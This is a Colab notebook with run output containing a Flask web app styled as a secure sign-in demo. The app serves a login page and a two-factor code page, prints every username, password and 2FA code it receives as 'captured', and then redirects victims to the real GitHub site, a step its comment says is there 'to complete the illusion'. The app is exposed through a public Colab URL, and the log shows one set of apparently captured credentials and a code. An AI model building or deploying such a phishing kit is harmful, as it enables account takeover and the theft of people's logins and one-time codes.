In [2]:
# --------------------------------------------------------------------------------
# INSTRUCTIONS FOR GOOGLE COLAB:
# Run these two commands in separate Colab cells BEFORE running the Python script below.
# --------------------------------------------------------------------------------
!pip install flask
!pip install --upgrade jupyter_http_over_ws
# --------------------------------------------------------------------------------

from flask import Flask, render_template_string, request, redirect, url_for

# --------------------------------------------------
# SIMULATION LOGIC
# --------------------------------------------------
def verify_credentials_externally(username, password):
    """
    Simulates checking credentials based on flexible plausibility rules (username OR email).
    This logic now handles both username and email formats.
    """

    # Check 1: Plausible Password Length
    is_plausible_password = len(password) >= 8

    # Check 2: Plausible Login Format (Must be a valid-looking email OR a valid-looking username)
    if '@' in username:
        # Input looks like an email (we assume it is plausible)
        is_plausible_login = True
    else:
        # Input looks like a username (check minimum length)
        is_plausible_login = len(username) >= 4

    if is_plausible_login and is_plausible_password:
        print("SIMULATION: Credentials passed dynamic plausibility check. Returning SUCCESS.")
        return True
    else:
        print("SIMULATION: Credentials failed dynamic plausibility check. Returning FAILURE.")
        return False

def validate_two_factor_code(code):
    """
    Simulates checking the 2FA code. A 6-digit number is considered plausible.
    """
    if code and code.isdigit() and len(code) == 6:
        print(f"SIMULATION: 2FA Code '{code}' is plausible (6 digits). Returning SUCCESS.")
        return True
    else:
        print(f"SIMULATION: 2FA Code '{code}' failed plausibility check. Returning FAILURE.")
        return False

# --------------------------------------------------
# HTML TEMPLATES
# --------------------------------------------------

# --- 1. Login Form ---
LOGIN_HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SECURE DEMO LOGIN</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;600;700&display=swap');
        body { font-family: 'Inter', sans-serif; background-color: #f0f4f8; }
        .error-message { color: #DC2626; background-color: #FEE2E2; padding: 10px; border-radius: 6px; margin-bottom: 16px; border: 1px solid #FCA5A5; }
    </style>
</head>
<body class="min-h-screen flex items-center justify-center p-4">
    <div class="w-full max-w-sm bg-white p-8 rounded-xl shadow-2xl border border-gray-100">
        <h2 class="text-3xl font-bold text-center text-gray-800 mb-6">Sign In Demo</h2>

        {% if message %}
            <div class="error-message">{{ message }}</div>
        {% endif %}

        <form method="POST" action="/submit" class="space-y-4">
            <div>
                <label for="username" class="block text-sm font-medium text-gray-700 mb-1">Username or email address</label>
                <input type="text" id="username" name="username" placeholder="Enter your credentials"
                       class="w-full px-4 py-2 border border-gray-300 rounded-lg focus:ring-blue-500 focus:border-blue-500 transition duration-150 ease-in-out" required>
            </div>

            <div>
                <label for="password" class="block text-sm font-medium text-gray-700 mb-1">Password</label>
                <input type="password" id="password" name="password" placeholder="Enter your password"
                       class="w-full px-4 py-2 border border-gray-300 rounded-lg focus:ring-blue-500 focus:border-blue-500 transition duration-150 ease-in-out" required>
            </div>

            <button type="submit"
                    class="w-full bg-green-600 hover:bg-green-700 text-white font-semibold py-2.5 rounded-lg shadow-md transition duration-200 ease-in-out transform hover:scale-[1.01] focus:outline-none focus:ring-4 focus:ring-green-500 focus:ring-opacity-50">
                Log In
            </button>
        </form>

        <p class="mt-6 text-xs text-center text-gray-500">
            This is a local development demonstration. Credentials are only displayed in the server console.
        </p>
    </div>
</body>
</html>
"""

# --- 2. Redirect to 2FA Page (Internal) ---
TWO_FACTOR_REDIRECT_HTML = """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DEMO REDIRECT</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="min-h-screen flex flex-col items-center justify-center p-4 bg-gray-100">
    <div class="w-full max-w-lg bg-white p-10 rounded-xl shadow-2xl border border-gray-200 text-center">
        <h1 class="text-4xl font-bold text-blue-600 mb-4">Authentication Required</h1>
        <p class="text-gray-600 mb-6">
            Login successful. Now simulating the request for your Two-Factor Authentication code.
        </p>
        <script>
            setTimeout(() => {
                window.location.href = "{{ url_for('two_factor') }}";
            }, 3000); // Redirect after 3 seconds for effect
        </script>
        <p class="text-sm text-gray-400 mt-4">Redirecting to the 2FA entry page in 3 seconds...</p>
    </div>
</body>
</html>
"""

# --- 3. 2FA Code Input Form ---
TWO_FACTOR_HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TWO-FACTOR CODE</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;600;700&display=swap');
        body { font-family: 'Inter', sans-serif; background-color: #f0f4f8; }
        .error-message { color: #DC2626; background-color: #FEE2E2; padding: 10px; border-radius: 6px; margin-bottom: 16px; border: 1px solid #FCA5A5; }
    </style>
</head>
<body class="min-h-screen flex items-center justify-center p-4">
    <div class="w-full max-w-sm bg-white p-8 rounded-xl shadow-2xl border border-gray-100">
        <h2 class="text-3xl font-bold text-center text-gray-800 mb-6">Enter Authentication Code</h2>

        {% if message %}
            <div class="error-message">{{ message }}</div>
        {% endif %}

        <p class="text-sm text-gray-600 mb-6 text-center">Open your authenticator app and enter the 6-digit code.</p>

        <form method="POST" action="/validate_2fa" class="space-y-6">
            <div>
                <label for="code" class="block text-sm font-medium text-gray-700 mb-1">6-digit code</label>
                <input type="text" id="code" name="code" placeholder="123456" maxlength="6"
                       class="w-full px-4 py-2 border border-gray-300 text-center text-xl tracking-widest rounded-lg focus:ring-blue-500 focus:border-blue-500 transition duration-150 ease-in-out" required>
            </div>

            <button type="submit"
                    class="w-full bg-green-600 hover:bg-green-700 text-white font-semibold py-2.5 rounded-lg shadow-md transition duration-200 ease-in-out transform hover:scale-[1.01] focus:outline-none focus:ring-4 focus:ring-green-500 focus:ring-opacity-50">
                Verify
            </button>
        </form>

        <p class="mt-6 text-xs text-center text-gray-500">
            This is a local development demonstration. The code is only displayed in the server console.
        </p>
    </div>
</body>
</html>
"""

# --- 4. Final Success/Redirect to Dashboard ---
FINAL_SUCCESS_HTML = """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>FINAL SUCCESS</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="min-h-screen flex flex-col items-center justify-center p-4 bg-gray-100">
    <div class="w-full max-w-lg bg-white p-10 rounded-xl shadow-2xl border border-gray-200 text-center">
        <h1 class="text-4xl font-bold text-green-600 mb-4">✅ Authentication Complete!</h1>
        <p class="text-gray-600 mb-6">
            The authentication code passed the **simulated** check. You are now logged in.
        </p>
        <!-- The final redirection to the user's dashboard -->
        <script>
            console.log("Redirecting to real GitHub dashboard to complete the illusion...");
            setTimeout(() => {
                window.location.href = "https://github.com/"; // Final dashboard redirect
            }, 3000); // Redirect after 3 seconds for effect
        </script>
        <p class="text-sm text-gray-400 mt-4">Redirecting you to the GitHub dashboard in 3 seconds...</p>
    </div>
</body>
</html>
"""


app = Flask(__name__)

# Route 1: Show initial login form
@app.route('/', methods=['GET'])
def index():
    return render_template_string(LOGIN_HTML_TEMPLATE, message=None)

# Route 2: Handle initial login form submission
@app.route('/submit', methods=['POST'])
def handle_submit():
    username = request.form.get('username')
    password = request.form.get('password')

    # 1. Credential Capture
    print("--------------------------------------------------")
    print(">>> STAGE 1: LOGIN CREDENTIALS CAPTURED <<<")
    print(f"USERNAME/EMAIL: {username}")
    print(f"PASSWORD: {password}")
    print("--------------------------------------------------")

    # 2. Simulated Verification
    if verify_credentials_externally(username, password):
        # Successful login: Redirect to the internal 2FA staging page
        return render_template_string(TWO_FACTOR_REDIRECT_HTML)
    else:
        # Failed login: Show error on the form
        error_msg = "Incorrect username or password. Please try again."
        return render_template_string(LOGIN_HTML_TEMPLATE, message=error_msg)

# Route 3: Display the 2FA input form
@app.route('/two-factor', methods=['GET'])
def two_factor():
    return render_template_string(TWO_FACTOR_HTML_TEMPLATE, message=None)

# Route 4: Handle 2FA code submission
@app.route('/validate_2fa', methods=['POST'])
def validate_2fa_code_submission():
    code = request.form.get('code')

    # 1. 2FA Code Capture
    print("--------------------------------------------------")
    print(">>> STAGE 2: 2FA CODE CAPTURED <<<")
    print(f"2FA CODE: {code}")
    print("--------------------------------------------------")

    # 2. Simulated Validation
    if validate_two_factor_code(code):
        # Successful 2FA: Show the final success page and redirect to the dashboard
        return render_template_string(FINAL_SUCCESS_HTML)
    else:
        # Failed 2FA: Show error on the 2FA form
        error_msg = "Invalid authentication code. Please check your app and try again."
        return render_template_string(TWO_FACTOR_HTML_TEMPLATE, message=error_msg)


def start_server_colab():
    """Starts the Flask server using Colab's built-in tools for access."""
    try:
        from google.colab.output import eval_js
        port = 5000
        print(f"Starting server on port {port}. Access link will be generated shortly...")
        print(eval_js(f"google.colab.kernel.proxyPort({port})"))
        app.run(host='0.0.0.0', port=port, debug=False)

    except Exception as e:
        print(f"Could not use Colab environment setup ({e}). Attempting standard local run...")
        app.run(host='127.0.0.1', port=5000, debug=True)

if __name__ == '__main__':
    start_server_colab()

Starting server on port 5000. Access link will be generated shortly...
https://5000-m-s-18z077c64hm66-c.us-central1-0.prod.colab.dev
 * Serving Flask app '__main__'
 * Debug mode: off


INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:5000
 * Running on http://172.28.0.12:5000
INFO:werkzeug:Press CTRL+C to quit
INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 22:20:05] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 22:20:19] "POST /submit HTTP/1.1" 200 -


--------------------------------------------------
>>> STAGE 1: LOGIN CREDENTIALS CAPTURED <<<
USERNAME/EMAIL: deviljerry
PASSWORD: qasimnaveed12345678
--------------------------------------------------
SIMULATION: Credentials passed dynamic plausibility check. Returning SUCCESS.


INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 22:20:23] "GET /two-factor HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 22:21:39] "POST /validate_2fa HTTP/1.1" 200 -


--------------------------------------------------
>>> STAGE 2: 2FA CODE CAPTURED <<<
2FA CODE: 310092
--------------------------------------------------
SIMULATION: 2FA Code '310092' is plausible (6 digits). Returning SUCCESS.
